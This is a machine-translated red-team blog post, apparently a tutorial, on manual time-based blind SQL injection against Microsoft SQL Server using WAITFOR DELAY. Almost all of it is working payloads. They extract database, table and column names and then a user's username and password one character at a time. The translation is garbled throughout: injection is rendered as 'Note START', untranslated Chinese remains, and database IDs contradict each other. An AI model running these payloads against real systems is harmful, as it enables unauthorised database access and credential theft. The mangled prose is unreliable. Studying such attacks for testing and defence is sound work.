saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Blind-delay time Microsoft SQL Server hands of Note Note
Delayed implantation Profile
Delay function WAITFOR DELAY
WAITFOR
Is the Transact-SQL in SQL Server provides ⼀ a flow control statements. Using it is wait for a certain time, and then continue to Perform subsequent statements. It Contains either argument DELAY
, Use to specify the time to wait.
If the statement is successful note START, will result in the database records and Web requests will be returned in response to a specific time delay. As the judgment condition statement does not relate to the situation, it is easy to note START success. According to Web requests are 延迟
, penetration testing can determine personnel on a website for the existence of vulnerabilities Note START. Also, because the statement does not return specific content, so it is also important to detect Remedies blind bets.
grammar:
WAITFOR DELAY '0:0:n'
⽰例:
WAITFOR DELAY '0:0:4' -- 表⽰延迟4秒
IF exists ()⼦句
grammar:
IF exists () WAITFOR DELAY '0:0:5'
Hand Delay Injection
1. Note START determines whether there
WAITFOR DELAY '0:0:4'
2. guess database name
Guess database name exists
if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
This statement means it is to determine dibd=6
whether the database exists! If there is then 延迟3秒
returned!
According dbid guess the name of the library, the first to guess the length
if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--
Because I only database I created two databases: test
(dbid5), saulgoodman
(dbid6)
So I will be able to use the above statement to determine dbid5
the length 是否为5
, if it is 5
then 延迟3秒
returned!
Similarly guess dbid6
(saulgoodman) in length can use this statement:
if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--
If you have more empathy database then the above statement is so like a ~
According dbid queries one by one to query the database name
Because we dbid=4
This database is test
, then we can guess one by one since his database name:
猜解第一个字符:t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
猜解第二个字符:e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
猜解第三个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第四个字符:t
If you want to query dbid6
the database saulgoodman
so we just 改dbid
numbers like:
猜解第一个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第二个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第三个字符:u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
猜解第四个字符:l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
猜解第五个字符:g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
猜解第六个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第七个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第八个字符:d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
猜解第九个字符:m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
猜解第十个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第十一个字符:n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--
3. guess the table name
Because we know the database name test
, and then we can use the following statement to query the first length of the table name 是否等于5
(table name is users):
if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--
The figure shows a page 返回正常
that it is the table name length 5
, then we can guess his character one by one:users
猜解第一个字符:u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
猜解第五个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--
Because we know that the database name is test
the first name is a table users
, and then we can use the following statement to query the 第二个表名
character (table name is info):
猜解第一个字符:i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--
4. guess the column name
Because we know the table name users
, then we can guess users
the column names in the table under the name :( column name is username)
猜解第一个字符:u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
猜解第五个字符:n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
猜解第六个字符:a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
猜解第七个字符:m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
猜解第八个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--
This solution out guess the first column name username
!
The second way: we have id
, username
, password
, age
four columns
:( get the first column is the column name id)
获取第一个字符:i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
获取第二个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--
Obtaining a second column is the column name :( username)
获取第一个字符:u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
获取第二个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
获取第三个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第四个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
获取第五个字符:n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
获取第六个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
获取第七个字符:m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
获取第八个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--
Gets the third column is the column name :( password)
获取第一个字符:p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
获取第二个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
获取第三个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
获取第四个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
获取第五个字符:w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
获取第六个字符:o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
获取第七个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
获取第八个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--
The data verbatim guess
We know the table name: users
the column name is: username
, passwrd
then we started the burst data: (saul)
判断username列第一个字符:s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
判断username列第二个字符:a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
判断username列第三个字符:u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
判断username列第四个字符:l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
This will get to the first user name:saul
Obtain saul
passwords :( password is saul520)
判断 password 列第一个字符:s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
判断 password 列第二个字符:a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
判断 password 列第三个字符:u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
判断 password 列第四个字符:l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
判断 password 列第五个字符:5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
判断 password 列第六个字符:2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
判断 password 列第七个字符:0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
Since hieroglyphics Mssql
injection time of manual Boolean blinds on here -